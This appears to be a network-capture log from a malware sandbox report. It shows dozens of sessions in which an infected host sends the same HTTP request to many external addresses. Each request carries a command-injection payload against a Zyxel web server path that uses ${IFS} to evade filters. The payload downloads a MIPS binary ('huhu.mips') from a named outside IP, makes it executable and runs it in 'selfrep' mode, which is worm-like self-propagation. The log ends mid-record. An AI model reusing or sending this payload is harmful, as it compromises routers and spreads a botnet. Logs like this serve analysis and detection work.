                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146258116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5449192.168.2.133485217.45.12.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146280050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5450192.168.2.1333358115.165.140.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146322966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5451192.168.2.133704087.140.140.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146348953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5452192.168.2.1360826151.254.215.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146409035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5453192.168.2.1354138186.222.5.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146441936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5454192.168.2.1339600147.193.59.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146473885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5455192.168.2.1333270140.127.32.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146513939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5456192.168.2.136016097.161.56.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146542072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5457192.168.2.1352308117.26.174.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146584034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5458192.168.2.1357984153.114.186.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146636009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5459192.168.2.1350794110.238.2.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146682024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5460192.168.2.1338638219.24.57.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146713018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5461192.168.2.1339886207.86.13.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146750927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5462192.168.2.1357000116.108.172.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146784067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5463192.168.2.135201438.242.25.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146856070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5464192.168.2.1333376130.238.207.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146873951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5465192.168.2.1340402172.43.48.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146912098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5466192.168.2.134688035.129.30.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146949053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5467192.168.2.135401297.124.128.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146991968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5468192.168.2.1358580100.221.163.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147027016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5469192.168.2.1337690139.81.182.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147049904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5470192.168.2.1353040172.127.11.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147094011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5471192.168.2.133695032.35.4.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147144079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5472192.168.2.135062059.185.218.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147171974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5473192.168.2.1350662166.79.172.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147223949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5474192.168.2.1342714128.112.93.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147254944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5475192.168.2.134679692.145.8.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147278070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5476192.168.2.1351032158.14.230.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147319078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5477192.168.2.13395504.90.179.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147366047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5478192.168.2.1334052169.19.127.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147399902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5479192.168.2.1354952190.87.115.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147425890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5480192.168.2.135033045.15.166.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147475958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5481192.168.2.1356806142.77.75.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147522926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5482192.168.2.1359500199.66.139.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147558928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5483192.168.2.1344384153.94.68.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147594929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5484192.168.2.1336034160.208.203.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147624016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5485192.168.2.1356684191.6.169.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147664070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5486192.168.2.1352974160.180.254.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147701979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5487192.168.2.13364202.178.191.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147733927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5488192.168.2.1333808138.126.108.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147778034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5489192.168.2.134881859.41.26.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147805929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5490192.168.2.1344938182.59.237.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147862911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5491192.168.2.1337524136.222.119.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147893906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5492192.168.2.1352272195.69.52.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147943974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5493192.168.2.133555218.206.105.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.147972107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5494192.168.2.133715695.153.75.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148020029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5495192.168.2.135715661.190.139.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148053885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5496192.168.2.1341398103.39.30.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148097038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5497192.168.2.1356030209.26.231.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148128033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5498192.168.2.134049088.243.250.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148165941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5499192.168.2.1357002223.187.186.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148200989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5500192.168.2.1341792169.214.187.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148228884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5501192.168.2.1347940112.82.204.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148302078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5502192.168.2.134948684.204.98.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148335934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5503192.168.2.1349622187.128.22.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148379087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5504192.168.2.1339726119.134.100.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148411036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5505192.168.2.1341746154.173.125.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148447990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5506192.168.2.1350672109.188.4.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148479939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5507192.168.2.134488274.50.211.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148514032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5508192.168.2.133720036.19.220.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148566961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5509192.168.2.1357356102.170.72.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148602962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5510192.168.2.1360496131.128.46.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148647070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5511192.168.2.1338328126.63.231.47443
                                                  TimestampBytes transferredDirectionData
